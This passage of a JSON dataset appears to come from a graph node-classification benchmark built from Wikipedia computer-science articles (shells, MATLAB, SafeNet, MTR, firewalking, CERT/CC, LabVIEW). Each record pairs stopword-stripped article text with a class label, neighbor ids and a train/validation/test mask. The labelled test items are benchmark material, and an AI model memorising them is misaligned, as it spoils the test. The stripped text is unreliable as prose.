typed user short command names compact systems representing program options common short names sometimes hard user recall early systems lacked storage resources provide detailed on-line user instruction guide graphical shells desktop shells provide means manipulating programs based graphical user interface gui allowing operations opening closing moving resizing windows well switching focus windows graphical shells may included desktop environments come separately even set loosely coupled utilities graphical user interfaces develop metaphor electronic desktop data files represented paper documents desk application programs similarly graphical representations instead invoked command names graphical shells typically build top windowing system case x window system wayland shell consists x window manager wayland compositor respectively well one multiple programs providing functionality start installed applications manage open windows virtual desktops often support widget engine case macos quartz could thought windowing system shell consists finder dock systemuiserver mission control modern versions microsoft windows operating system use windows shell shell windows shell provides familiar desktop environment start menu task bar well graphical user interface accessing file management functions operating system older versions also include program manager shell 3.x series microsoft windows fact shipped later versions windows 95 nt types least windows xp interfaces windows versions 1 2 markedly different desktop applications also considered shells long use third-party engine likewise many individuals developers dissatisfied interface windows explorer developed software either alters functioning appearance shell replaces entirely windowblinds stardock good example former sort application litestep emerge desktop good examples latter interoperability programmes purpose-designed software lets windows users use equivalents many various unix-based guis discussed well macintosh equivalent os/2 presentation manager version 3.0 run os/2 programmes conditions using os/2 environmental subsystem versions windows nt shell also used loosely describe application software built around particular component web browsers email clients analogy shells found nature also sometimes referred wrappers expert systems shell piece software empty expert system without knowledge base particular application",
    "neighbors": [
      2560,
      9223,
      10761,
      6155,
      13,
      7187,
      532,
      7188,
      10771,
      10776,
      25,
      8729,
      4637,
      9762,
      4643,
      6180,
      7717,
      6701,
      4656,
      5681,
      7217,
      10803,
      564,
      9780,
      4151,
      10809,
      2621,
      6718,
      576,
      2625,
      5698,
      6213,
      6221,
      1112,
      3160,
      10333,
      607,
      97,
      1121,
      11363,
      6760,
      10856,
      9835,
      621,
      8301,
      8304,
      2676,
      6772,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      639,
      1152,
      5247,
      642,
      2179,
      5249,
      2181,
      8829,
      10883,
      10891,
      6797,
      10382,
      6296,
      2201,
      9370,
      9882,
      2717,
      9887,
      3235,
      3750,
      7847,
      5292,
      8879,
      178,
      9907,
      11442,
      4277,
      6837,
      6329,
      8889,
      700,
      5823,
      8388,
      1736,
      2248,
      9930,
      5324,
      1741,
      5840,
      1235,
      2262,
      7382,
      8410,
      9946,
      9436,
      8414,
      1247,
      11489,
      2786,
      742,
      7403,
      5357,
      242,
      4850,
      5363,
      9466,
      3323,
      9468,
      1278,
      5888,
      3330,
      4870,
      1804,
      273,
      8977,
      787,
      3859,
      789,
      5397,
      11549,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      8499,
      7477,
      823,
      1336,
      1849,
      4409,
      6459,
      7483,
      8504,
      7999,
      8001,
      11075,
      4423,
      5452,
      6988,
      5457,
      7507,
      6486,
      7511,
      2399,
      10592,
      3426,
      8551,
      11112,
      9066,
      5484,
      7020,
      1902,
      879,
      11635,
      5492,
      2933,
      376,
      8573,
      2430,
      7039,
      8063,
      10113,
      10623,
      8069,
      10631,
      394,
      3978,
      4492,
      7057,
      1426,
      11675,
      413,
      2462,
      5022,
      8611,
      421,
      934,
      935,
      1445,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6583,
      6078,
      9151,
      4033,
      11204,
      11205,
      4040,
      8136,
      9166,
      978,
      11390,
      486,
      6120,
      10730,
      10731,
      1007,
      6128,
      5105,
      8687,
      3571,
      5619,
      6134,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 7326,
    "label": 9,
    "text": "MATLAB:matlab matlab matrix laboratory multi-paradigm numerical computing environment proprietary programming language developed mathworks matlab allows matrix manipulations plotting functions data implementation algorithms creation user interfaces interfacing programs written languages including c c++ c java fortran python although matlab intended primarily numerical computing optional toolbox uses mupad symbolic engine allowing access symbolic computing abilities additional package simulink adds graphical multi-domain simulation model-based design dynamic embedded systems 2018 matlab 3 million users worldwide matlab users come various backgrounds engineering science economics cleve moler chairman computer science department university new mexico started developing matlab late 1970s designed give students access linpack eispack without learn fortran soon spread universities found strong audience within applied mathematics community jack little engineer exposed visit moler made stanford university 1983 recognizing commercial potential joined moler steve bangert rewrote matlab c founded mathworks 1984 continue development rewritten libraries known jackpac 2000 matlab rewritten use newer set libraries matrix manipulation lapack matlab first adopted researchers practitioners control engineering little specialty quickly spread many domains also used education particular teaching linear algebra numerical analysis popular amongst scientists involved image processing matlab application built around matlab scripting language common usage matlab application involves using command window interactive mathematical shell executing text files containing matlab code variables defined using assignment operator codice_1 matlab weakly typed programming language types implicitly converted inferred typed language variables assigned without declaring type except treated symbolic objects type change values come constants computation involving values variables output function example simple array defined using colon syntax initial codice_2 increment codice_2 terminator instance defines variable named codice_4 assigns new value existing variable name codice_4 array consisting values 1 3 5 7 9 array starts 1 initial value increments step previous value 2 increment value stops reaches avoid exceeding 9 terminator value increment value actually left syntax along one colons use default value 1. assigns variable named codice_6 array values 1 2 3 4 5 since default value 1 used incrementer indexing one-based usual convention matrices mathematics although programming languages c c++ java matrices defined separating elements row blank space comma using semicolon terminate row list elements surrounded square brackets parentheses used access elements subarrays also used denote function argument list sets indices specified expressions 2:4 evaluates 2 3 4 example submatrix taken rows 2 4 columns 3 4 written square identity matrix size n generated using function eye matrices size zeros ones generated functions zeros ones respectively transposing vector matrix done either function transpose adding prime dot matrix without dot matlab perform conjugate transpose matlab functions accept matrices apply element example codice_7 multiply every element j 2 reduce element modulo n matlab include standard loops similar applications r using vectorized notation often produces code faster execute code excerpted function magic.m creates magic square odd values n matlab function codice_8 used generate square matrices j containing 1 n matlab structure data types since variables matlab arrays adequate name structure array element array field names addition matlab supports dynamic field names field look-ups name field manipulations etc. unfortunately matlab jit support matlab structures therefore simple bundling various variables structure come cost creating matlab function name file match name first function file valid function names begin alphabetic character contain letters numbers underscores functions often case sensitive matlab supports elements lambda calculus introducing function handles function references implemented either .m files anonymous/nested functions matlab supports object-oriented programming including classes inheritance virtual dispatch packages pass-by-value semantics pass-by-reference semantics however syntax calling conventions significantly different languages matlab value classes reference classes depending whether class handle super-class reference classes value classes method call behavior different value reference classes example call method alter member object object instance reference class example simple class provided put file named hello.m executed following commands matlab supports developing applications graphical user interface gui features matlab includes guide gui development environment graphically designing guis also tightly integrated graph-plotting features example function plot used produce graph two vectors x code produces following figure sine function matlab program produce three-dimensional graphics using functions surf plot3 mesh matlab graphical user interfaces programmed gui design environment guide tool matlab call functions subroutines written programming languages c fortran wrapper function created allowing matlab data types passed returned mex files matlab executables dynamically loadable object files created compiling functions since 2014 increasing two-way interfacing python added libraries written perl java activex .net directly called matlab many matlab libraries example xml sql support implemented wrappers around java activex libraries calling matlab java complicated done matlab toolbox sold separately mathworks using undocumented mechanism called jmi java-to-matlab interface confused unrelated java metadata interface also called jmi official matlab api java added 2016 alternatives mupad based symbolic math toolbox available mathworks matlab connected maple mathematica libraries also exist import export mathml matlab proprietary product mathworks users subject vendor lock-in although matlab builder products deploy matlab functions library files used .net java application building environment future development still tied matlab language toolbox purchased separately evaluation license requested mathworks sales department requires detailed information project matlab evaluated granted often evaluation license valid two four weeks student version matlab available home-use license matlab simulink subset mathwork toolboxes substantially reduced prices reported european union eu competition regulators investigating whether mathworks refused sell licenses competitor regulators dropped investigation complainant withdrew accusation evidence wrongdoing found matlab number competitors commercial competitors include mathematica tk solver maple idl also free open source alternatives matlab particular gnu octave scilab freemat sagemath intended mostly compatible matlab language julia programming language also initially used matlab-like syntax among languages treat arrays basic entities array programming languages apl fortran 90 higher s-lang well statistical languages r s. also libraries add similar functionality existing languages it++ c++ perl data language perl ilnumerics .net numpy/scipy/matplotlib python scilua/torch lua sciruby ruby numeric.js javascript gnu octave unique alternatives treats incompatibility matlab bug see matlab compatibility gnu octave theory octave thus superset matlab language practice octave implement matlab functionality number release number version reported concurrent license manager program flexlm complete list changes matlab official toolboxes consult matlab release notes several easter eggs exist matlab include hidden pictures jokes example typing spy used generate picture spies spy vs spy displays image dog typing randomly outputs philosophical answer commands include penny toilet image life every easter egg appears every version matlab",
    "neighbors": [
      3076,
      7684,
      5129,
      15,
      10256,
      5148,
      9245,
      5677,
      5684,
      7734,
      1591,
      6718,
      2557,
      7235,
      68,
      10819,
      8262,
      5703,
      11343,
      6228,
      3159,
      2652,
      10848,
      100,
      1130,
      1131,
      5741,
      623,
      3705,
      7292,
      5759,
      1152,
      9345,
      2181,
      7301,
      1673,
      6797,
      7825,
      10387,
      5783,
      155,
      10399,
      9376,
      8868,
      4777,
      7341,
      10413,
      1203,
      692,
      7356,
      2242,
      5830,
      9926,
      4808,
      5833,
      7889,
      1234,
      10964,
      9944,
      9946,
      228,
      10470,
      4840,
      5356,
      10991,
      5872,
      7924,
      2297,
      7421,
      5380,
      9479,
      7945,
      2317,
      7950,
      5395,
      3876,
      3367,
      10026,
      7983,
      6450,
      6962,
      823,
      4919,
      8514,
      5450,
      8524,
      8013,
      847,
      1360,
      3412,
      2903,
      8549,
      6502,
      8554,
      363,
      1399,
      3960,
      1917,
      6016,
      1923,
      3462,
      8582,
      6536,
      3980,
      8079,
      8082,
      6039,
      2457,
      1435,
      7580,
      1951,
      1443,
      7076,
      8611,
      7593,
      5034,
      5546,
      428,
      9133,
      2990,
      10153,
      8113,
      4020,
      6074,
      4029,
      963,
      8644,
      4042,
      462,
      10703,
      2000,
      11219,
      5588,
      2519,
      477,
      479,
      8162,
      4069,
      11239,
      7147,
      5612,
      7148,
      9714,
      3573,
      1016,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7327,
    "label": 4,
    "text": "SafeNet:safenet safenet inc. information security company based belcamp maryland united states acquired august 2014 french security company gemalto safenet products marketed safenet product brand include solutions enterprise authentication data encryption key management safenet software monetization products sold gemalto sentinel brand safenet notably one largest suppliers encryption technology united states government 8 august 2014 gemalto announced signed definitive agreement acquire 100 share capital safenet vector capital us 890 million debt free/cash free basis subsequent acquisition gemalto french rival thales group completed 2 april 2019 former rainbow technologies subsidiary safenet government solutions llc formerly safenet mykotronx still based torrance california offices irvine california columbia maryland company founded 1979 myko enterprises changed name mykotronx inc 1987 merged safenet part safenet merger rainbow 2004 safenet government solutions llc operationally merged safenet lines two organizations intentionally blurred due financial reasons safenet government solutions longer considered subsidiary safenet government solutions llc provides infosec comsec technology us government firm indefinite-delivery indefinite-quantity contract kiv-7 line commercial off-the-shelf cryptographic devices provide protection digital voice communications top secret used agencies nsa nro products include kov-14 fortezza plus pc card developed part nsa nssi program used secure terminal equipment previously developed clipper chip 2009 vector capital acquired aladdin knowledge systems placed safenet annotation 'under common management 2010 two companies officially merged",
    "neighbors": [
      32,
      9924,
      838,
      5433,
      8330,
      3629,
      7887,
      6993,
      10801,
      3573,
      5621,
      4760,
      2425,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 7328,
    "label": 7,
    "text": "Caspio:caspio caspio privately held global software company headquartered santa clara california offices ukraine poland philippines founded frank zamani 2000 caspio provides non-technical business professionals ability create database-centric web applications without coding caspio founder ceo frank zamani worked microsoft developer late 1990s vision enable organizations build custom cloud applications ease fraction time cost versus traditional software development “ wanted build tool business users create applications without coding ” zamani said “ time lot people said ’ done ’ going stop me. ” today caspio powers 1 million applications 100 countries research projects global low-code development platform market size grow us 4.32 billion 2017 us 27.23 billion 2022 compound annual growth rate cagr 44.49 forecast period",
    "neighbors": [
      9901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7329,
    "label": 4,
    "text": "MTR_(software):mtr software traceroute originally named matt traceroute mtr computer program combines functions traceroute ping programs one network diagnostic tool mtr probes routers route path limiting number hops individual packets may traverse listening responses expiry regularly repeat process usually per second keep track response times hops along path original matt traceroute program written matt kimball 1997 roger wolff took maintaining mtr renamed traceroute october 1998 mtr licensed terms gnu general public license gpl works modern unix-like operating systems normally works text console also optional gtk+-based graphical user interface gui mtr relies internet control message protocol icmp time exceeded type 11 code 0 packets coming back routers icmp echo reply packets packets hit destination host mtr also user datagram protocol udp mode invoked -u command line pressing u key curses interface sends udp packets time live ttl field ip header increasing one probe sent toward destination host udp mode used mtr relies icmp port unreachable packets type 3 code 3 destination reached mtr also supports ipv6 works similar manner instead relies icmpv6 messages tool often used network troubleshooting showing list routers traversed average round-trip time well packet loss router allows users identify links two given routers responsible certain fractions overall latency packet loss network help identify network overuse problems example shows mtr running linux tracing route host machine example.lan web server yahoo p25.www.re2.yahoo.com across level 3 communications network additional example shows recent version mtr running freebsd mpls labels displayed default -e switch used command line e key pressed curses interface winmtr windows gui application functionally equivalent mtr originally developed appnor msp s.r.l maintained white-tiger although similar winmtr shares common code mtr console version mtr exist windows fewer features mtr platforms",
    "neighbors": [
      225,
      1647,
      7983,
      8976,
      11249,
      11250,
      8692,
      5397,
      11221,
      823,
      11413,
      5402,
      2045,
      5470,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 7330,
    "label": 1,
    "text": "Australian_Rock_Database:australian rock database australian rock database website searchable online database listed details australian rock music artists albums bands producers record labels established 2000 swedish national magnus holmgren developed interest australian music visiting exchange student information database entries initially gleaned chris spencer zbig nowara paul mchenry australian rock 3rd ed 1993 ian mcfarlane encyclopedia australian rock pop 1999 australian government former website culture recreation listed australian rock database resource australian rock music",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7331,
    "label": 0,
    "text": "Terminology-oriented_database:terminology-oriented database terminology-oriented database terminology-oriented database management system conceptual extension object-oriented database implements concepts defined terminology model compared object-oriented databases terminology-oriented database requires minor conceptual extensions schema level supporting set relations super-set subset intersection etc weak-typed collections shared inheritance data model terminology-oriented database high-level terminology-oriented database provides facilities transforming terminology model provided subject area experts completely database schema target schema might database schema object-oriented database well relational database schema even xml schema typically terminology-oriented databases bound specific database type since information content stored object-oriented databases relational databases identical data terminology-oriented database stored theoretically type database well xml file thus terminology-oriented databases may support several database systems storing application data terminology databases contain terms vocabularies become valuable ontologies turn ontologies help process associated triples complex predicates thus going deeper hierarchies keys rdbms semantic mapping also enhance performance",
    "neighbors": [
      2271,
      2901,
      9286,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7332,
    "label": 2,
    "text": "LliureX:lliurex lliurex project generalitat valenciana whose objective introduction new technologies information communication based free software education system valencian community linux distribution used 110,000 pcs schools valencia region",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 7333,
    "label": 2,
    "text": "Haptik:haptik haptik enterprise conversational al platform based mumbai india founded 2013 platform reaches 30 million devices monthly processed billion messages far technology infrastructure employs blend artificial intelligence natural language processing machine learning haptik founded aakrit vaish swapan rajdev university illinois engineering alumni august 2013 march 2014 company launched first product haptik app chat-based personal assistant lets users get things done android ios platforms india september 2014 platform powered 125 chat experts helped users queries time evolved full-blown conversational commerce app 2 million downloads 15 million app installs company launched life insurance chat-bot hdfc life baap bot fathers day august 2015 dan roth university illinois joined haptik board advisers make platform underlying nlp technology layer smarter year haptik became official personal assistant mumbai city fc also provided customer support chat-bot swipe telecom may 2016 company growing 20 percent month-on-month chat volume downloads user addition put together technology perspective 25 percent responses already automated platform november 2017 company launched full-scale enterprise level bot management platform including analytics dashboard company partnered amazon pay hdfc life ola cabs uber times internet mumbai city fc coca-cola ziman zomato bookmyshow cleartrip goibibo urbanclap via.com dineout flipkart run campaigns haptik app march 2018 company partnered amazon web services aws offer al-enabled conversational solutions customers india haptik entered strategic partnership combinator-backed leena ai provide enterprises types bot solutions haptik repertoire chatbot customers india includes samsung future group kfc dream11 sharekhan edelweiss tokio club mahindra iifl among others haptik also built assistants toi samsung ziman akancha harassment online cyber safety initiative haptik one world largest conversational ai platforms october 2017 times india app incorporated haptik virtual personal assistant service sprite exclusive brand partner samsung second partner uses haptik power ‘ assistant ’ service pre-installed samsung galaxy s7 galaxy s7 edge india haptik built scalable support bot dream11 helped online handle 8x volume without large support staff ipl 2018 april times internet acquired majority stake company invested 11.2 million business haptik raised 11.2m series b funding round times internet april 2016 earlier company received funding 1 million kalaari capital september 2014 haptik app chat-based personal assistant allowing users set reminders book cab flight tickets recharge phones pay utility bills find places vicinity web check-in uses artificial intelligence ai machine learning deliver fast precise results platform successful forging alliances technology humans haptik utilizes skill set human resources customer service help train bots reported deccan chronicle platform app runs uses artificial intelligence al machine learning deliver fast precise results haptik open sourced proprietary named entity recognition system powers chatbots behind haptik app chatbot summit held berlin june 26 2017",
    "neighbors": [
      6208,
      4995,
      2059,
      6827,
      4624,
      7248
    ],
    "mask": "Train"
  },
  {
    "node_id": 7334,
    "label": 4,
    "text": "Fail-stop:fail-stop fail-stop subset computer language one semantics original except case exceptional condition arises fail-stop subset must report exceptional condition whenever superset language reports one may additionally report exceptional condition cases fail-stop languages often used computer systems correctness important since easier make systems fail-fast example operator many programming languages associative possibility floating-point overflow repairing languages fail fast commonly assumed properties hold makes much easier write verify correct code many widely used programming languages code might reduce bank account value deposited amount old account value large causing overflowed value assigned new_bank_account_value fail-stop language treats overflow exceptional condition either correct terminate exceptional condition",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7335,
    "label": 3,
    "text": "Programmer's_key:programmer key programmer key interrupt button button switch macos-era macintosh systems jumps machine code monitor symbol button ⎉ 68000 family based macintosh computers interrupt request also sent holding command key striking power key keyboard effect also simulated 68000 environment mac os nanokernel powerpc machines classic environment plastic insert came macintosh 128k macintosh 512k macintosh plus computers could attached exterior case used press interrupt button located motherboard modern mac hardware longer includes interrupt button mac os x operating system integrated debugging options addition mac os x protected memory blocks direct patching system memory order better secure system",
    "neighbors": [
      8544,
      10533,
      4910,
      5520,
      5457,
      10357,
      5976,
      8540
    ],
    "mask": "None"
  },
  {
    "node_id": 7336,
    "label": 4,
    "text": "Firewalk_(computing):firewalk computing firewalking technique developed mike schiffman david goldsmith utilizes traceroute techniques ttl values analyze ip packet responses order determine gateway acl access control list filters map networks active reconnaissance network security analysis technique attempts determine layer 4 protocols specific firewall allow firewalk software tool performs firewalking protect firewall gateway firewalking one block icmp time exceeded messages",
    "neighbors": [
      5472,
      8998,
      939,
      9356,
      11249,
      11250,
      1493,
      5402,
      8668,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7337,
    "label": 4,
    "text": "CERT_Coordination_Center:cert coordination center cert coordination center cert/cc coordination center computer emergency response team cert software engineering institute sei non-profit united states federally funded research development center cert/cc researches software bugs impact software internet security publishes research information findings works business government improve security software internet whole first organization kind cert/cc created pittsburgh november 1988 darpa direction response morris worm incident cert/cc part cert division software engineering institute 150 cybersecurity professionals working projects take proactive approach securing systems cert program partners government industry law enforcement academia develop advanced methods technologies counter large-scale sophisticated cyber threats cert program part software engineering institute sei federally funded research development center ffrdc carnegie mellon university main campus pittsburgh cert registered trademark carnegie mellon university 2003 department homeland security entered agreement carnegie mellon university create us-cert us-cert national computer security incident response team csirt united states america cooperation often causes confusion cert/cc us-cert related two organizations distinct entities general us-cert handles cases concern us national security whereas cert/cc handles general cases often internationally cert/cc coordinates information us-cert computer security incident response teams licensed use name “ cert. ” organizations license cert name carnegie mellon university organizations independent entities established countries operated cert/cc cert/cc established first organization promoting cooperating information exchange various national certs private product security psirts research work cert/cc split several different work areas key capabilities products listed cert/cc works directly software vendors private sector well government agencies address software vulnerabilities provide fixes public process known coordination cert/cc promotes particular process coordination known responsible coordinated disclosure case cert/cc works privately vendor address vulnerability public report published usually jointly vendor security advisory extreme cases vendor unwilling resolve issue contacted cert/cc typically discloses information publicly 45 days since first contact attempt software vulnerabilities coordinated cert/cc may come internal research outside reporting vulnerabilities discovered outside individuals organizations may reported cert/cc using cert/cc vulnerability reporting form depending severity reported vulnerability cert/cc may take action address vulnerability coordinate software vendor cert/cc regularly publishes vulnerability notes cert knowledgebase vulnerability notes include information recent vulnerabilities researched coordinated individuals organizations may mitigate vulnerabilities vulnerability notes database meant comprehensive cert/cc provides number free tools security research community tools offered include following cert/cc periodically offers training courses researchers organizations looking establish psirts cert coordination center summer 2014 cert research funded us federal government key de-anonymization tor anonymity network information subpoenaed cert fbi used take silkroad 2.0 fall fbi denied paying deanonymize users cmu denied receiving funding compliance government subpoena despite indirectly contributing taking numerous illicit websites arrest least 17 suspects research raised multiple issues cmu said statement november 2015 ... university time time served subpoenas requesting information research performed university abides rule law complies lawfully issued subpoenas receives funding compliance even though motherboard reported neither fbi cmu explained authority first learned research subpoenaed appropriate information past sei also declined explain nature particular research response press inquiries saying thanks inquiry practice comment law enforcement investigations court proceedings",
    "neighbors": [
      5636,
      6916,
      7561,
      5002,
      11,
      9868,
      4240,
      7059,
      2709,
      5404,
      413,
      6177,
      1965,
      943,
      10928,
      10110,
      8373,
      10680,
      4797,
      8773,
      2118,
      3021,
      10190,
      4435,
      5589,
      2262,
      5722,
      4062,
      5855,
      2018,
      10344,
      107,
      6382,
      4081,
      1912,
      2041,
      4092,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7338,
    "label": 8,
    "text": "Mongoose_(web_server):mongoose web server mongoose cross-platform embedded web server networking library functions including tcp http client server websocket client server mqtt client broker much small size software enables internet-connected device function web server mongoose available gpl v2 commercial licenses mongoose built top mongoose embedded library used implementation restful services serve web gui embedded devices create rpc frameworks e.g json-rpc mongoose cross-platform application used windows macintosh os linux qnx ecos free rtos android ios via application programming interface api mongoose embedded programs mongoose written c. mongoose used several companies various industries functions mongoose include august 2013 license changed mit license dual gplv2/commercial licensing scheme license change mongoose forked different forks eventually diverged significantly new features added",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      9365,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      9387,
      44,
      7983,
      6064,
      10800,
      11439,
      2485,
      6714,
      4797,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      4837,
      9441,
      103,
      9834,
      6379,
      5612,
      9580,
      2287,
      6127,
      11376,
      8691,
      10611,
      11386,
      2045,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 7339,
    "label": 1,
    "text": "Comparison_of_MySQL_database_engines:comparison mysql database engines comparison available database engines mysql database management system dbms database engine storage engine underlying software component dbms uses create read update delete crud data database",
    "neighbors": [
      11392,
      8195,
      10628,
      10258,
      2197,
      7453,
      1950,
      9503,
      9010,
      1594,
      10048,
      6721,
      5964,
      5198,
      2130,
      7506,
      2901,
      9687,
      10459,
      6245,
      8295,
      8683,
      2413,
      7022,
      3188,
      246,
      9335,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 7340,
    "label": 5,
    "text": "SpaceTime_(software):spacetime software spacetime also known spacetime3d 3d graphical user interface displays web pages 3d tabbed stack interface available online flash application free desktop software download microsoft windows operating system technology presented 2008 ces tradeshow ceo eddie bakhash began working spacetime 1993 product debuted beta june 4 2007 day release san jose mercury news noted software advanced 3-d navigation system 've seen n't make dizzy except thoughts could become software capabilities compared current browsing 3d technologies techcrunch comment spacetime pure eye candy sort like second life meets firefox online version spacetime features ability search google google images wikipedia youtube desktop application released beta form june 4 2007 currently available windows 2000 xp vista systems mac os x version planned 2008 yet come fruition spacetime developers currently working port product opengl framework order support linux unix operating systems using search engines including google google images yahoo yahoo image ebay flickr spacetime loads first ten results stack pages beta browser received mixed reviews katherine boehret wall street journal stated though ’ still rely google basic searches visual search save time turn searching fun process jack m. germain technewsworld described spacetime delivers promise save time provide revolutionary online searching stating continue use 3-d searching environment though fun work edward n. albro pcworld gave beta browser 2.5/5 stating visual results make searches easier basic browsing spacetime appeal browser buggy slow basic browsing",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      8557,
      5492,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 7341,
    "label": 9,
    "text": "LabVIEW:labview laboratory virtual instrument engineering workbench labview system-design platform development environment visual programming language national instruments graphical language named g confused g-code originally released apple macintosh 1986 labview commonly used data acquisition instrument control industrial automation variety operating systems oss including microsoft windows various versions unix linux macos latest versions labview labview 2019 labview nxg 3.1 released may 2019 programming paradigm used labview sometimes called g based data availability enough data available subvi function subvi function execute execution flow determined structure graphical block diagram labview-source code programmer connects different function-nodes drawing wires wires propagate variables node execute soon input data become available since might case multiple nodes simultaneously labview execute inherently parallel multi-processing multi-threading hardware exploited automatically built-in scheduler multiplexes multiple os threads nodes ready execution labview integrates creation user interfaces termed front panels development cycle labview programs-subroutines termed virtual instruments vis vi three components block diagram front panel connector pane last used represent vi block diagrams calling vis front panel built using controls indicators controls inputs allow user supply information vi indicators outputs indicate display results based inputs given vi back panel block diagram contains graphical source code objects placed front panel appear back panel terminals back panel also contains structures functions perform operations controls supply data indicators structures functions found functions palette placed back panel collectively controls indicators structures functions referred nodes nodes connected one another using wires e.g. two controls indicator wired addition function indicator displays sum two controls thus virtual instrument run either program front panel serving user interface dropped node onto block diagram front panel defines inputs outputs node connector pane implies vi easily tested embedded subroutine larger program graphical approach also allows nonprogrammers build programs dragging dropping virtual representations lab equipment already familiar labview programming environment included examples documentation makes simple create small applications benefit one side also certain danger underestimating expertise needed high-quality g programming complex algorithms large-scale code important programmer possess extensive knowledge special labview syntax topology memory management advanced labview development systems offer ability build stand-alone applications furthermore possible create distributed applications communicate client–server model thus easier implement due inherently parallel nature g. applications labview usually designed using well-known architectures known design patterns common design patterns graphical labview applications listed table labview includes extensive support interfacing devices instruments camera devices users interface hardware either writing direct bus commands usb gpib serial using high-level device-specific drivers provide native labview function nodes controlling device labview includes built-in support ni hardware platforms compactdaq compactrio large number device-specific blocks hardware measurement automation explorer max virtual instrument software architecture visa toolsets national instruments makes thousands device drivers available download ni instrument driver network idnet labview includes compiler produces native code cpu platform aids performance graphical code translated executable machine code compiler labview syntax strictly enforced editing process compiled executable machine code requested run upon saving latter case executable source code merged single file executable runs help labview run-time engine contains pre-compiled code perform common tasks defined g language run-time engine reduces compiling time provides consistent interface various operating systems graphic systems hardware components etc run-time environment makes code portable across platforms generally labview code slower equivalent compiled c code although differences often lie program optimization inherent execution speed many libraries large number functions data acquisition signal generation mathematics statistics signal conditioning analysis etc. along numerous functions integration filters specialized abilities usually associated data capture hardware sensors enormous addition labview includes text-based programming component named mathscript added functions signal processing analysis mathematics mathscript integrated graphical programming using script nodes uses syntax compatible generally matlab labview inherently concurrent language easy program multiple tasks performed parallel via multithreading example done easily drawing two parallel loops connecting two separate nodes great benefit test system automation common practice run processes like test sequencing data recording hardware interfacing parallel due longevity popularity labview language ability users extend functions large ecosystem third party add-ons developed via contributions community ecosystem available labview tools network marketplace free paid labview add-ons low-cost labview student edition aimed educational institutions learning purposes also active community labview users communicate several electronic mailing lists email groups internet forums national instruments provides low cost labview home bundle edition labview proprietary product national instruments unlike common programming languages c fortran labview managed specified third party standards committee american national standards institute ansi institute electrical electronics engineers ieee international organization standardization iso etc many users criticised tendency freeze crash simple tasks often requiring software shut restarted small applications still start run-time environment large slow task tends restrict labview monolithic applications examples might tiny programs grab single value hardware used scripting language overhead run-time environment render approach impractical labview g language non-textual software tools versioning side-by-side diff comparison version code change tracking applied manner textual programming languages additional tools make comparison merging code source code control versioning tools subversion cvs perforce ability zoom enlarge vi hard see large high-resolution monitor practice however n't problem good programming practice means creating subroutines sub-vis keeping block diagram uncluttered relatively small 2005 starting labview 8.0 major versions released around first week august coincide annual national instruments conference ni week followed bug-fix release following february 2009 national instruments began naming releases year released bug-fix termed service pack example 2009 service pack 1 released february 2010 2017 national instruments moved annual conference may released labview 2017 alongside completely redesigned labview nxg 1.0 built windows presentation foundation wpf openg well lava code repository lavacr serve repositories wide range open source labview applications libraries sourceforge labview listed one possible languages code written vi package manager become standard package manager labview libraries similar purpose ruby rubygems perl cpan although provides graphical user interface similar synaptic package manager vi package manager provides access repository openg libraries labview tools exist convert mathml g code national instruments also offers product named measurement studio offers many test measurement control abilities labview set classes use microsoft visual studio allows developers harness labview strengths within text-based .net framework national instruments also offers labwindows/cvi alternative ansi c programmers applications need sequencing users often use labview teststand test management software also national instruments ch interpreter c/c++ interpreter embedded labview scripting tril centre ireland biomobius platform dsp robotics flowstone dsp also use form graphical programming similar labview limited biomedical robotics industries respectively labview direct node modefrontier multidisciplinary multi-objective optimization design environment written allow coupling almost computer-aided engineering tool part process workflow description virtually driven optimization technologies available modefrontier",
    "neighbors": [
      2691,
      11267,
      7301,
      9224,
      5129,
      3980,
      6797,
      15,
      8079,
      7825,
      4885,
      4121,
      5148,
      3613,
      7326,
      7580,
      1952,
      6184,
      5546,
      1917,
      2222,
      3886,
      5680,
      7341,
      2994,
      6962,
      7983,
      9133,
      1462,
      823,
      6718,
      321,
      2242,
      3649,
      10819,
      1221,
      2117,
      5703,
      5830,
      5833,
      4042,
      5067,
      5578,
      11219,
      10964,
      3413,
      9557,
      8162,
      4069,
      11239,
      4840,
